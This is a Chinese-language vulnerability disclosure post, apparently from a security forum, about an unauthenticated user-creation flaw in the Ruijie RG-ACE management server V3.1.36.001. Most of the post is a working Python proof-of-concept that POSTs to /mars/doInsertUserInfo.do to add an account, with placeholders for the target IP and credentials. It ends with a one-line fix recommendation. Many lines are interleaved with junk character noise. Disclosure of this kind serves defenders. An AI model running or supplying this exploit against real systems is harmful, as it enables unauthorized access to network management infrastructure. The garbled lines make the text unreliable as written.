锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
) p6 \) T+ I) J! Z' k0 A0 _$ \2 z
7 V& L$ S7 \+ l
; Y( ]8 L, [9 {' G. H测试的具体版本是
2 g2 I- k; A  b; v4 n# H产品名称: 锐捷应用控制引擎
9 `! D1 O( T2 t" g版本号: 3.1.36.001 TC
; y& Y) M3 J  c. w, X编译时间: 201104291730


) O, M$ e& F; T# O. x; o漏洞证明：
9 v9 |0 m  z# n9 n5 s( P  K, b# L
/ T; A# \( q8 U, O. h8 {
- O. l8 Q3 g8 `; W. K

3 O1 s+ z6 \: z6 ?
  l$ q  ]; M- k& X! y: X
" k- w( I3 m8 d7 z1 T5 r" |& N执行脚本
0 x% ?0 I) d) e0 }3 d3 c& t* M: r#! /usr/bin/env python
  L) z3 Q, B6 M7 d& K/ g; {#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
7 c  N- K" T' `) c( U$ o: n* ourl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
) l7 T) L  R9 f# f# Y7 ?; sopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
7 C2 {) U7 r! eopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
& w. D7 l0 x4 f: Spost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
7 r" G, U  m( j+ V8 P" ]("pwd","aaaaaa"),######密码自己加
: Z; a+ }( Y" V  ?0 m: E("trueName","ad"),
("email",""),
("mobilePhone",""),
7 s0 w8 f% }3 [3 O6 l, x) N("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
7 e; O1 u3 e7 r: G/ V. Np=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

登录，连接设备

$ N4 O( y; w& T+ d
- C% Y6 J0 S; ^) D


) i: R  p# M( y1 c/ E默认的管理员admin权限更大点


. O+ m3 M0 D3 t! `


  e2 V  z/ d1 I0 |2 j9 D9 [+ P; ?' e修复方案：
" w* G6 F' x1 |2 ^+ O4 S加强对接口的权限验证
% q& k) S1 ?8 R* N  K1 `, K